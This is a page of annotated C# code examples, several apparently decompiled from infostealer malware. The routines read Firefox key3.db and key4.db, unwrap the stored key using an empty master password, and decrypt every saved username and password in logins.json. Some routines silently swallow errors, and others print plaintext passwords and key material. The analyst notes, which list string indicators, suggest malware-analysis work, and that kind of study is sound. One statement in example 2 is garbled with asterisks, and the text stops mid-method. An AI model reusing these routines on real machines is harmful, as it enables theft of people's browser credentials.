Ejemplo n.º 1
 // Token: 0x060000E8 RID: 232 RVA: 0x00007314 File Offset: 0x00005514
 /// <summary>
 /// Opens the SQLite file at <paramref name="file"/>, reads row 0 of table "metaData" and one row of
 /// table "nssPrivate", derives a key/IV with <c>MozillaPBE</c> using an empty password, and returns the
 /// 3DES-CBC-decrypted "a11" blob as bytes.
 /// </summary>
 /// <param name="file">Path of the key database to read. Nothing is parsed if the file does not exist.</param>
 /// <returns>
 /// The decrypted bytes on success. If the file is missing, or an exception is thrown before the final
 /// assignment, the initial 24 zero bytes are returned, so the return value alone does not signal failure.
 /// </returns>
 /// <remarks>
 /// Analyst notes: the routine writes the source path, both salts, the derived key and IV, and the decrypted
 /// key to stdout through FirefoxBase.CalcHex (presumably hex-encoded; confirm). The fixed message prefixes
 /// below are therefore usable as static string indicators, and any captured console output from a run
 /// contains key material. The password argument is always the empty string, so this path presumably only
 /// succeeds against a profile that has no primary (master) password set.
 /// </remarks>
 private static byte[] ExtractPrivateKey4(string file)
 {
     // Default result: 24 zero bytes, returned unchanged on every failure path.
     byte[] array = new byte[24];
     try
     {
         Console.WriteLine("Key source file: " + file);
         if (!File.Exists(file))
         {
             Console.WriteLine("Source file UNKNOWN");
             return(array);
         }
         SQLiteManager sqliteManager = new SQLiteManager(file);
         sqliteManager.ReadTable("metaData");
         // "item1" is used below as the global salt; the second column name is the literal "item2)"
         // (sic, the ')' is part of the string) and its value is parsed as ASN.1/DER.
         string        value         = sqliteManager.GetValue(0, "item1");
         string        value2        = sqliteManager.GetValue(0, "item2)");
         Asn1DerObject asn1DerObject = new Asn1Der().Parse(Encoding.Default.GetBytes(value2));
         // data  = entry salt (per the log message below), data2 = ciphertext of the check value.
         byte[]        data          = asn1DerObject.objects[0].objects[0].objects[1].objects[0].Data;
         byte[]        data2         = asn1DerObject.objects[0].objects[1].Data;
         // Second argument is the empty string; presumably this is the master-password input (confirm in MozillaPBE).
         MozillaPBE    mozillaPBE    = new MozillaPBE(Encoding.Default.GetBytes(value), Encoding.Default.GetBytes(string.Empty), data);
         mozillaPBE.Compute();
         // The decrypted check value is only logged; it is never compared against an expected string.
         string input = TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, data2, PaddingMode.None);
         Console.WriteLine(new string('=', 20));
         Console.WriteLine("Global salt found for encrypt: [" + FirefoxBase.CalcHex(value) + "]");
         Console.WriteLine("Entry salt found for encrypt: [" + FirefoxBase.CalcHex(data) + "]");
         // NOTE(review): the leading 'С' in the next two literals appears to be Cyrillic U+0421 rather than
         // Latin 'C'; confirm against the binary. If so, byte-exact string signatures must account for it.
         Console.WriteLine("СheckPwd key for encrypt : [" + FirefoxBase.CalcHex(mozillaPBE.Key) + "]");
         Console.WriteLine("СheckPwd IV for encrypt: [" + FirefoxBase.CalcHex(mozillaPBE.IV) + "]");
         Console.WriteLine("Decrypted chiper: [" + FirefoxBase.CalcHex(input) + "]");
         Console.WriteLine(new string('=', 20));
         sqliteManager.ReadTable("nssPrivate");
         int    rowCount = sqliteManager.GetRowCount();
         string s        = string.Empty;
         // Take "a11" from the first row whose "a102" equals FirefoxBase.MagicNumber1 (decoded as a string).
         // If no row matches, s stays empty and the parse below runs on empty input.
         for (int i = 0; i < rowCount; i++)
         {
             if (sqliteManager.GetValue(i, "a102") == Encoding.Default.GetString(FirefoxBase.MagicNumber1))
             {
                 s = sqliteManager.GetValue(i, "a11");
                 break;
             }
         }
         Asn1DerObject asn1DerObject2 = new Asn1Der().Parse(Encoding.Default.GetBytes(s));
         // Same DER positions as above, now for the "a11" blob: entry salt and ciphertext.
         data       = asn1DerObject2.objects[0].objects[0].objects[1].objects[0].Data;
         data2      = asn1DerObject2.objects[0].objects[1].Data;
         mozillaPBE = new MozillaPBE(Encoding.Default.GetBytes(value), Encoding.Default.GetBytes(string.Empty), data);
         mozillaPBE.Compute();
         Console.WriteLine(new string('=', 20));
         Console.WriteLine("ChiperT found after encrypt: [" + FirefoxBase.CalcHex(data2) + "]");
         Console.WriteLine("Global salt found after encrypt: [" + FirefoxBase.CalcHex(value) + "]");
         Console.WriteLine("Entry salt found after encrypt: [" + FirefoxBase.CalcHex(data) + "]");
         Console.WriteLine("СheckPwd key after encrypt : [" + FirefoxBase.CalcHex(mozillaPBE.Key) + "]");
         Console.WriteLine("СheckPwd IV after encrypt: [" + FirefoxBase.CalcHex(mozillaPBE.IV) + "]");
         // The decryptor returns a string that is converted back to bytes with Encoding.Default.
         array = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, data2, PaddingMode.PKCS7));
         Console.WriteLine("Decrypted private key: [" + FirefoxBase.CalcHex(array) + "]");
         Console.WriteLine(new string('=', 20));
     }
     catch (Exception value3)
     {
         // The full exception (including stack trace) goes to stdout; the current value of array is then returned.
         Console.WriteLine(value3);
     }
     return(array);
 }
Ejemplo n.º 2
        /// <summary>
        /// Reads a temporary copy of "logins.json" taken from <paramref name="profile"/> and, for each entry of
        /// its "logins" array, base64-decodes and DER-parses encryptedUsername and encryptedPassword, then
        /// 3DES-CBC-decrypts both with <paramref name="privateKey"/>.
        /// </summary>
        /// <param name="profile">Directory that contains logins.json.</param>
        /// <param name="privateKey">Key passed to TripleDESHelper.DESCBCDecryptor for every entry.</param>
        /// <param name="browser_name">Label concatenated into the collected record text.</param>
        /// <param name="profile_name">Label concatenated into the collected record text.</param>
        /// <remarks>
        /// Analyst notes: the profile file is not read in place. CreateTempCopy is called first, so a copy of
        /// logins.json presumably appears elsewhere on disk (the location is not visible here). Every exception
        /// is discarded by the empty catch, so the routine produces no error output of its own.
        /// </remarks>
        public static void Lopos(string profile, byte[] privateKey, string browser_name, string profile_name)
        {
            try
            {
                string path = CreateTempCopy(Path.Combine(profile, "logins.json"));
                if (File.Exists(path))
                {
                    {
                        foreach (JsonValue item in File.ReadAllText(path).FromJSON()["logins"])
                        {
                            // Counter is incremented before decryption, so it counts entries seen, not entries decrypted.
                            GetPasswords.Cpassword++;
                            Asn1DerObject Gecko4  = Asn1Der.Parse(Convert.FromBase64String(item["encryptedUsername"].ToString(saving: false)));
                            Asn1DerObject Gecko42 = Asn1Der.Parse(Convert.FromBase64String(item["encryptedPassword"].ToString(saving: false)));
                            // DER positions [0][1][1] and [0][2] supply the second and third decryptor arguments
                            // (presumably IV and ciphertext). The regex drops everything outside U+0020..U+007F,
                            // so non-ASCII characters in a stored value are lost.
                            string        text    = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, Gecko4.Objects[0].Objects[1].Objects[1].GetObjectData(), Gecko4.Objects[0].Objects[2].GetObjectData(), PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
                            string        text2   = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, Gecko42.Objects[0].Objects[1].Objects[1].GetObjectData(), Gecko42.Objects[0].Objects[2].GetObjectData(), PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);

                            // NOTE(review): the next statement is not valid C# as shown. The listing has replaced part of the
                            // expression with asterisks, and `i` is not declared anywhere in the visible code.
                            credential.Add("Site_Url : " + item["hostname"] + Environment.NewLine + "Login : "******"Password : "******"Browser : " + browser_name + Environment.NewLine + "Profile : " + profile_name + Environment.NewLine + credential[i]);
                        }
                        // The collection is emptied after the loop; whatever consumed it is not visible in this listing.
                        credential.Clear();
                    }
                }
            }
            catch (Exception)
            {
                // Intentionally empty in the original: all failures are silent.
            }
        }
Ejemplo n.º 3
        /// <summary>
        /// Reads the password-check record and the wrapped key from a key4.db database via
        /// <c>GetItemsFromQuery</c>, verifies the check value, and returns the result of <c>decrypt3DES</c>.
        /// </summary>
        /// <param name="dir">Passed through to GetItemsFromQuery; presumably the profile directory (confirm in that helper).</param>
        /// <param name="masterPwd">Passed to decrypt3DES only; it is not used for the password check below.</param>
        /// <param name="Verbose">When true, progress messages are written to the console.</param>
        /// <returns>
        /// The value returned by decrypt3DES, or null when the check value does not start with
        /// "password-check" or any exception is thrown.
        /// </returns>
        /// <remarks>
        /// Analyst notes: both SQL statements are constants, so no caller input reaches the query text.
        /// The console strings in this method are fixed and usable as static indicators.
        /// </remarks>
        public byte[] CheckKey4DB(string dir, string masterPwd, bool Verbose)
        {
            try
            {
                Asn1Der asn   = new Asn1Der();
                byte[]  item2 = new byte[] { };
                byte[]  item1 = new byte[] { };
                byte[]  a11   = new byte[] { };
                byte[]  a102  = new byte[] { };
                string  query = "SELECT item1,item2 FROM metadata WHERE id = 'password'";
                if (Verbose)
                {
                    Console.WriteLine("Fetch data from key4.db file");
                }
                // item1 is used as the first MozillaPBE input (the global salt in the sibling routines); item2 is DER-parsed.
                GetItemsFromQuery(dir, ref item1, ref item2, query);
                Asn1DerObject f800001  = asn.Parse(item2);
                // The password input here is the empty string, not masterPwd.
                MozillaPBE    CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data);
                CheckPwd.Compute();

                string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data);

                // A decrypted value that does not begin with "password-check" is treated as a wrong master password.
                if (!decryptedPwdChk.StartsWith("password-check"))
                {
                    Console.WriteLine("Master password is wrong !");
                    return(null);
                }

                query = "SELECT a11,a102 FROM nssPrivate";
                // a102 is fetched but not read again in this method.
                GetItemsFromQuery(dir, ref a11, ref a102, query);
                var decodedA11 = asn.Parse(a11);
                var entrySalt  = decodedA11.objects[0].objects[0].objects[1].objects[0].Data;
                var cipherT    = decodedA11.objects[0].objects[1].Data;
                if (Verbose)
                {
                    Console.WriteLine("Fetch Private key");
                }
                return(decrypt3DES(item1, masterPwd, entrySalt, cipherT));
            }
            catch (Exception ex)
            {
                // Only the message is printed (no stack trace); the caller sees null.
                Console.WriteLine("Exeption:\n" + ex.Message);
                return(null);
            }
        }
Ejemplo n.º 4
        /// <summary>
        /// Entry point: calls <c>Searcher.CopyLoginsInSafeDir</c>, waits for a line on stdin, then opens
        /// "key4.db" through the <c>BerkeleyDB</c> reader and walks the password-check / wrapped-key records
        /// to compute a 24-byte key.
        /// </summary>
        /// <remarks>
        /// Analyst notes: MasterPwd and filePath are both left as empty strings, so the database path resolves
        /// to "key4.db" relative to the current directory and the password input is empty. The decrypted check
        /// value is never inspected and the computed key is not used after the method ends in the visible code.
        /// There is no exception handling in this method.
        /// </remarks>
        private static void Main()
        {
            // Helper is not visible here; by its name it copies login files before parsing (confirm).
            Searcher.CopyLoginsInSafeDir();
            // Blocks until a line is entered on stdin.
            Console.ReadLine();

            string MasterPwd = string.Empty;
            bool   Verbose   = false;
            string filePath  = string.Empty;
            var    dt        = new DataTable();
            var    asn       = new Asn1Der();

            var db = new BerkeleyDB(Path.Combine(filePath, "key4.db"));

            // Three lookups over db.Keys: the "password-check" record, the "global-salt" record, and the first
            // record that is none of "global-salt", "Version", "password-check". Dashes are stripped from each value.
            var    pwdCheck   = new PasswordCheck((from p in db.Keys where p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", ""));
            string GlobalSalt = (from p in db.Keys where p.Key.Equals("global-salt") select p.Value).FirstOrDefault().Replace("-", "");
            string f81        = (from p in db.Keys where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check") select p.Value).FirstOrDefault().Replace("-", "");

            var CheckPwd = new MozillaPBE(MasterPassword.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), MasterPassword.ConvertHexStringToByteArray(pwdCheck.EntrySalt));

            CheckPwd.Compute();
            // Result is assigned but never compared with an expected value.
            string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, MasterPassword.ConvertHexStringToByteArray(pwdCheck.Passwordcheck));

            Asn1DerObject f800001 = asn.Parse(MasterPassword.ConvertHexStringToByteArray(f81));

            MozillaPBE CheckPrivateKey = new MozillaPBE(MasterPassword.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(MasterPwd), f800001.objects[0].objects[0].objects[1].objects[0].Data);

            CheckPrivateKey.Compute();

            byte[] decryptF800001 = TripleDESHelper.DESCBCDecryptorByte(CheckPrivateKey.Key, CheckPrivateKey.IV, f800001.objects[0].objects[1].Data);

            // The decrypted blob is DER again; its [0][2] field holds a further nested DER structure.
            Asn1DerObject f800001deriv1 = asn.Parse(decryptF800001);
            Asn1DerObject f800001deriv2 = asn.Parse(f800001deriv1.objects[0].objects[2].Data);

            // Keep the last 24 bytes of field [0][3] when it is longer than 24; otherwise use the field as is.
            byte[] privateKey = new byte[24];
            if (f800001deriv2.objects[0].objects[3].Data.Length > 24)
            {
                Array.Copy(f800001deriv2.objects[0].objects[3].Data, f800001deriv2.objects[0].objects[3].Data.Length - 24, privateKey, 0, 24);
            }
            else
            {
                privateKey = f800001deriv2.objects[0].objects[3].Data;
            }
        }
Ejemplo n.º 5
 /// <summary>
 /// Reads tables "metaData" and "nssPrivate" from the SQLite file at <paramref name="file"/>, derives a
 /// key/IV with <c>MozillaPBE</c> using an empty password, and returns the 3DES-CBC-decrypted "a11" blob.
 /// </summary>
 /// <param name="file">Path of the key database to read.</param>
 /// <returns>
 /// The decrypted bytes on success; the initial 24 zero bytes if the file is missing or any exception is thrown.
 /// </returns>
 /// <remarks>
 /// Analyst notes: this is the same sequence as the logging variant of this routine, with all console output
 /// removed and the exception swallowed, so a run leaves no output of its own. The column literal "item2)"
 /// (sic) is shared with that variant and may help cluster related samples. The password argument is always
 /// the empty string, so the path presumably only succeeds when no primary (master) password is set.
 /// </remarks>
 private static byte[] P4k(string file)
 {
     byte[] result = new byte[24];
     try
     {
         if (!File.Exists(file))
         {
             return(result);
         }
         var cNT = new CNT(file);
         cNT.ReadTable("metaData");
         // s feeds MozillaPBE as its first input; s2 is DER-parsed for the entry salt and check ciphertext.
         string        s           = cNT.ParseValue(0, "item1");
         string        s2          = cNT.ParseValue(0, "item2)");
         Asn1DerObject ansobjectS2 = Asn1Der.Parse(Encoding.Default.GetBytes(s2));
         byte[]        objectData  = ansobjectS2.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData();
         byte[]        objectData2 = ansobjectS2.Objects[0].Objects[1].GetObjectData();
         var           inizialize  = new MozillaPBE(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData);
         inizialize.Compute();
         // Return value is discarded: the check ciphertext is decrypted but the result is never examined.
         TripleDESHelper.DESCBCDecryptor(inizialize.GetKey(), inizialize.GetIV(), objectData2);
         cNT.ReadTable("nssPrivate");
         int    rowLength = cNT.RowLength;
         string s3        = string.Empty;
         // Take "a11" from the first row whose "a102" equals Key4MagicNumber (decoded as a string).
         // If no row matches, s3 stays empty and the parse below runs on empty input.
         for (int i = 0; i < rowLength; i++)
         {
             if (cNT.ParseValue(i, "a102") == Encoding.Default.GetString(Key4MagicNumber))
             {
                 s3 = cNT.ParseValue(i, "a11");
                 break;
             }
         }
         Asn1DerObject ansobjectS3 = Asn1Der.Parse(Encoding.Default.GetBytes(s3));
         // Same DER positions as above, now for the "a11" blob.
         objectData  = ansobjectS3.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData();
         objectData2 = ansobjectS3.Objects[0].Objects[1].GetObjectData();
         inizialize  = new MozillaPBE(Encoding.Default.GetBytes(s), Encoding.Default.GetBytes(string.Empty), objectData);
         inizialize.Compute();
         result = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(inizialize.GetKey(), inizialize.GetIV(), objectData2, PaddingMode.PKCS7));
         return(result);
     }
     catch (Exception)
     {
         // Failure is silent; the caller receives whatever result held at the time (24 zero bytes unless already assigned).
         return(result);
     }
 }
Ejemplo n.º 6
 // Token: 0x060000E9 RID: 233 RVA: 0x000076D8 File Offset: 0x000058D8
 /// <summary>
 /// Reads the Berkeley DB file at <paramref name="file"/>, looks up the "password-check" and "global-salt"
 /// records plus the first remaining record, and unwraps the latter with a key/IV derived by
 /// <c>MozillaPBE</c> from an empty password.
 /// </summary>
 /// <param name="file">Path of the key database to read.</param>
 /// <returns>
 /// Field [0][3] of the innermost DER structure, truncated to its last 24 bytes when longer; the initial
 /// 24 zero bytes if the file is missing or any exception is thrown before assignment.
 /// </returns>
 /// <remarks>
 /// Analyst notes: the two console messages at the top are the only output; the bare catch discards every
 /// exception. The password argument is always the empty string, so the path presumably only succeeds when
 /// no primary (master) password is set.
 /// </remarks>
 private static byte[] ExtractPrivateKey3(string file)
 {
     byte[] array = new byte[24];
     try
     {
         Console.WriteLine("Key source file: " + file);
         if (!File.Exists(file))
         {
             Console.WriteLine("Source file UNKNOWN");
             return(array);
         }
         // Object is created and immediately discarded (no effect visible here).
         new DataTable();
         Asn1Der       asn1Der       = new Asn1Der();
         BerkeleyDB    berkeleyDB    = new BerkeleyDB(file);
         PasswordCheck passwordCheck = new PasswordCheck(FirefoxBase.FindValueByKey(berkeleyDB, (string x) => x.Equals("password-check")));
         string        hexString     = FirefoxBase.FindValueByKey(berkeleyDB, (string x) => x.Equals("global-salt"));
         MozillaPBE    mozillaPBE    = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), ByteHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
         mozillaPBE.Compute();
         // Return value is discarded: the password-check blob is decrypted but the result is never examined.
         TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, ByteHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None);
         // The wrapped key is the first record whose name is none of the three well-known ones.
         string        hexString2    = FirefoxBase.FindValueByKey(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt"));
         Asn1DerObject asn1DerObject = asn1Der.Parse(ByteHelper.ConvertHexStringToByteArray(hexString2));
         MozillaPBE    mozillaPBE2   = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), asn1DerObject.objects[0].objects[0].objects[1].objects[0].Data);
         mozillaPBE2.Compute();
         // The decryptor returns a string that is converted back to bytes with Encoding.Default before DER parsing.
         byte[]        bytes          = Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(mozillaPBE2.Key, mozillaPBE2.IV, asn1DerObject.objects[0].objects[1].Data, PaddingMode.None));
         Asn1DerObject asn1DerObject2 = asn1Der.Parse(bytes);
         Asn1DerObject asn1DerObject3 = asn1Der.Parse(asn1DerObject2.objects[0].objects[2].Data);
         // Keep the last 24 bytes of field [0][3] when it is longer than 24; otherwise use the field as is.
         if (asn1DerObject3.objects[0].objects[3].Data.Length > 24)
         {
             Array.Copy(asn1DerObject3.objects[0].objects[3].Data, asn1DerObject3.objects[0].objects[3].Data.Length - 24, array, 0, 24);
         }
         else
         {
             array = asn1DerObject3.objects[0].objects[3].Data;
         }
     }
     catch
     {
         // Intentionally empty in the original: all failures are silent.
     }
     return(array);
 }
Ejemplo n.º 7
        /// <summary>
        /// Reads the Berkeley DB file at <paramref name="file"/>, looks up the "password-check" and
        /// "global-salt" records plus the first remaining record, and unwraps the latter with a key/IV derived
        /// by <c>MozillaPBE</c> from an empty password.
        /// </summary>
        /// <param name="file">Path of the key database to read.</param>
        /// <returns>
        /// Field [0][3] of the innermost DER structure, truncated to its last 24 bytes when longer; the initial
        /// 24 zero bytes if the file is missing or any exception is thrown.
        /// </returns>
        /// <remarks>
        /// Analyst notes: the routine writes nothing to the console and swallows every exception, so a run
        /// leaves no output of its own. The password argument is always the empty string, so the path
        /// presumably only succeeds when no primary (master) password is set.
        /// </remarks>
        private static byte[] P3k(string file)
        {
            byte[] array = new byte[24];
            try
            {
                if (!File.Exists(file))
                {
                    return(array);
                }
                // Object is created and immediately discarded (no effect visible here).
                new DataTable();

                var berkeleyDB = new BerkeleyDB(file);

                var    Gecko7    = new PasswordCheck(ValueDB(berkeleyDB, (string x) => x.Equals("password-check")));
                string hexString = ValueDB(berkeleyDB, (string x) => x.Equals("global-salt"));

                var Gecko8 = new MozillaPBE(ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), ConvertHexStringToByteArray(Gecko7.EntrySalt));
                Gecko8.Compute();

                // Return value is discarded: the password-check blob is decrypted but the result is never examined.
                TripleDESHelper.DESCBCDecryptor(Gecko8.GetKey(), Gecko8.GetIV(), ConvertHexStringToByteArray(Gecko7.Passwordcheck));
                // The wrapped key is the first record whose name is none of the three well-known ones.
                Asn1DerObject Gecko4  = Asn1Der.Parse(ConvertHexStringToByteArray(ValueDB(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt"))));
                var           Gecko82 = new MozillaPBE(ConvertHexStringToByteArray(hexString), Encoding.Default.GetBytes(string.Empty), Gecko4.Objects[0].Objects[0].Objects[1].Objects[0].GetObjectData());
                Gecko82.Compute();

                // Decrypt the wrapped blob, DER-parse it, then DER-parse its [0][2] field once more.
                Asn1DerObject Gecko42 = Asn1Der.Parse(Asn1Der.Parse(Encoding.Default.GetBytes(TripleDESHelper.DESCBCDecryptor(Gecko82.GetKey(), Gecko82.GetIV(), Gecko4.Objects[0].Objects[1].GetObjectData()))).Objects[0].Objects[2].GetObjectData());

                // Use field [0][3] as is when it is at most 24 bytes; otherwise keep only its last 24 bytes.
                if (Gecko42.Objects[0].Objects[3].GetObjectData().Length <= 24)
                {
                    array = Gecko42.Objects[0].Objects[3].GetObjectData();
                    return(array);
                }
                Array.Copy(Gecko42.Objects[0].Objects[3].GetObjectData(), Gecko42.Objects[0].Objects[3].GetObjectData().Length - 24, array, 0, 24);
                return(array);
            }
            catch (Exception)
            {
                // Failure is silent; the caller receives whatever array held at the time.
                return(array);
            }
        }
Ejemplo n.º 8
        /// <summary>
        /// Reads the password-check record and the wrapped key via <c>GetItemsFromQuery</c>, verifies the check
        /// value, and returns the result of <c>decrypt3DES</c>.
        /// </summary>
        /// <param name="dir">Passed through to GetItemsFromQuery; presumably the profile directory (confirm in that helper).</param>
        /// <param name="masterPwd">Passed to decrypt3DES only; it is not used for the password check below.</param>
        /// <returns>
        /// The value returned by decrypt3DES, or null when the check value does not start with
        /// "password-check" or any exception is thrown.
        /// </returns>
        /// <remarks>
        /// Analyst notes: both SQL statements are constants, so no caller input reaches the query text.
        /// A failed check is reported through ErrorHandle.ErrorFunc (its sink is not visible here); exceptions
        /// are discarded without any report.
        /// </remarks>
        private byte[] CheckKey4DB(string dir, string masterPwd)
        {
            try
            {
                ErrorHandle eh    = new ErrorHandle();
                Asn1Der     asn   = new Asn1Der();
                byte[]      item2 = new byte[] { };
                byte[]      item1 = new byte[] { };
                byte[]      a11   = new byte[] { };
                byte[]      a102  = new byte[] { };
                string      query = "SELECT item1,item2 FROM metadata WHERE id = 'password'";
                // item1 is used as the first MozillaPBE input (the global salt in the sibling routines); item2 is DER-parsed.
                GetItemsFromQuery(dir, ref item1, ref item2, query);
                Asn1DerObject f800001  = asn.Parse(item2);
                // The password input here is the empty string, not masterPwd.
                MozillaPBE    CheckPwd = new MozillaPBE(item1, Encoding.ASCII.GetBytes(""), f800001.objects[0].objects[0].objects[1].objects[0].Data);
                CheckPwd.Compute();

                string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, f800001.objects[0].objects[1].Data);

                // A decrypted value that does not begin with "password-check" is treated as a wrong master password.
                if (!decryptedPwdChk.StartsWith("password-check"))
                {
                    eh.ErrorFunc("Master password is wrong !");
                    return(null);
                }

                query = "SELECT a11,a102 FROM nssPrivate";
                // a102 is fetched but not read again in this method.
                GetItemsFromQuery(dir, ref a11, ref a102, query);
                var decodedA11 = asn.Parse(a11);
                var entrySalt  = decodedA11.objects[0].objects[0].objects[1].objects[0].Data;
                var cipherT    = decodedA11.objects[0].objects[1].Data;

                return(decrypt3DES(item1, masterPwd, entrySalt, cipherT));
            }
            catch (Exception ex)
            {
                // ex is never used: the failure is silent and the caller sees null.
                return(null);
            }
        }
Ejemplo n.º 9
        // Token: 0x060000E5 RID: 229 RVA: 0x00007090 File Offset: 0x00005290
        /// <summary>
        /// Reads a temporary copy of "logins.json" taken from <paramref name="profile"/> and returns one
        /// <c>BrowserCredendtial</c> per entry whose host name, user name and password all decrypt to a
        /// non-empty value.
        /// </summary>
        /// <param name="profile">Directory that contains logins.json.</param>
        /// <param name="privateKey">Key passed to TripleDESHelper.DESCBCDecryptor for every entry.</param>
        /// <returns>
        /// The collected entries; an empty list if the copied file does not exist, and a partial list if an
        /// exception interrupts the loop.
        /// </returns>
        /// <remarks>
        /// Analyst notes: the profile file is not read in place. ChromiumManager.CreateTempCopy is called
        /// first, so a copy of logins.json presumably appears elsewhere on disk (the location is not visible
        /// here). Exceptions are printed in full to the console.
        /// </remarks>
        private static IEnumerable <BrowserCredendtial> ExtractLogins(string profile, byte[] privateKey)
        {
            List <BrowserCredendtial> list = new List <BrowserCredendtial>();

            try
            {
                string path = ChromiumManager.CreateTempCopy(Path.Combine(profile, "logins.json"));
                if (!File.Exists(path))
                {
                    return(list);
                }
                RootLogin rootLogin = File.ReadAllText(path).FromJSON <RootLogin>();
                Asn1Der   asn1Der   = new Asn1Der();
                foreach (LoginJson loginJson in rootLogin.logins)
                {
                    Asn1DerObject      asn1DerObject      = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedUsername));
                    Asn1DerObject      asn1DerObject2     = asn1Der.Parse(Convert.FromBase64String(loginJson.encryptedPassword));
                    // DER positions [0][1][1] and [0][2] supply the second and third decryptor arguments
                    // (presumably IV and ciphertext). The regex drops everything outside U+0020..U+007F,
                    // so non-ASCII characters in a stored value are lost.
                    string             text               = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject.objects[0].objects[1].objects[1].Data, asn1DerObject.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
                    string             text2              = Regex.Replace(TripleDESHelper.DESCBCDecryptor(privateKey, asn1DerObject2.objects[0].objects[1].objects[1].Data, asn1DerObject2.objects[0].objects[2].Data, PaddingMode.PKCS7), "[^\\u0020-\\u007F]", string.Empty);
                    // Empty fields are replaced by the sentinel "UNKNOWN"...
                    BrowserCredendtial browserCredendtial = new BrowserCredendtial
                    {
                        URL      = (string.IsNullOrEmpty(loginJson.hostname) ? "UNKNOWN" : loginJson.hostname),
                        Login    = (string.IsNullOrEmpty(text) ? "UNKNOWN" : text),
                        Password = (string.IsNullOrEmpty(text2) ? "UNKNOWN" : text2)
                    };
                    // ...and any record carrying the sentinel in one of the three fields is dropped. A stored
                    // value that is literally "UNKNOWN" is dropped as well.
                    if (browserCredendtial.Login != "UNKNOWN" && browserCredendtial.Password != "UNKNOWN" && browserCredendtial.URL != "UNKNOWN")
                    {
                        list.Add(browserCredendtial);
                    }
                }
            }
            catch (Exception value)
            {
                // The full exception goes to stdout; entries collected so far are still returned.
                Console.WriteLine(value);
            }
            return(list);
        }
Ejemplo n.º 10
        /// <summary>
        /// Opens "key3.db" in <paramref name="directory"/>, verifies <paramref name="masterPassword"/> against
        /// the "password-check" record, unwraps the stored key, and prints every entry of "logins.json" with
        /// its decrypted user name and password to the console.
        /// </summary>
        /// <param name="directory">Profile directory holding key3.db and logins.json.</param>
        /// <param name="userName">Label printed in the header line of each entry.</param>
        /// <param name="masterPassword">Password input for both key derivations; defaults to the empty string.</param>
        /// <remarks>
        /// Analyst notes: decrypted passwords are written to stdout in clear text, so any captured console
        /// output from a run contains them. The fixed message strings ("--- FireFox Credential (User: ",
        /// "[X] Could not retrieve private key.", ...) are usable as static indicators. With the default
        /// argument the check presumably only passes for a profile that has no primary (master) password set.
        /// The method has no exception handling; parse or I/O failures propagate to the caller.
        /// </remarks>
        private static void ParseLogins(string directory, string userName, string masterPassword = "")
        {
            // Read berkeleydb
            Asn1Der asn = new Asn1Der();

            BerkeleyDB    db       = new BerkeleyDB(Path.Combine(directory, "key3.db"));
            PasswordCheck pwdCheck = new PasswordCheck(db.GetValueOfKey("password-check").Replace("-", ""));
            //string GlobalSalt = (from p in db.Keys
            //                     where p.Key.Equals("global-salt")
            //                     select p.Value).FirstOrDefault().Replace("-", "");
            string GlobalSalt = db.GetValueOfKey("global-salt").Replace("-", "");

            MozillaPBE CheckPwd = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(masterPassword), ByteHelper.ConvertHexStringToByteArray(pwdCheck.EntrySalt));

            CheckPwd.Compute();
            string decryptedPwdChk = TripleDESHelper.DESCBCDecryptor(CheckPwd.Key, CheckPwd.IV, ByteHelper.ConvertHexStringToByteArray(pwdCheck.Passwordcheck));

            // A decrypted value that does not begin with "password-check" is treated as a wrong master password.
            if (!decryptedPwdChk.StartsWith("password-check"))
            {
                Console.WriteLine("Master password is wrong; cannot decrypt FireFox logins.");
                return;
            }

            // Get private key
            string f81 = String.Empty;

            // Every record whose name is not one of the three well-known keys overwrites f81,
            // so the last such record in db.Keys is the one used.
            String[] blacklist = { "global-salt", "Version", "password-check" };
            foreach (var k in db.Keys)
            {
                if (Array.IndexOf(blacklist, k.Key) == -1)
                {
                    f81 = k.Value.Replace("-", "");
                }
            }
            if (f81 == String.Empty)
            {
                Console.WriteLine("[X] Could not retrieve private key.");
                return;
            }

            Asn1DerObject f800001 = asn.Parse(ByteHelper.ConvertHexStringToByteArray(f81));


            MozillaPBE CheckPrivateKey = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(GlobalSalt), Encoding.ASCII.GetBytes(masterPassword), f800001.objects[0].objects[0].objects[1].objects[0].Data);

            CheckPrivateKey.Compute();

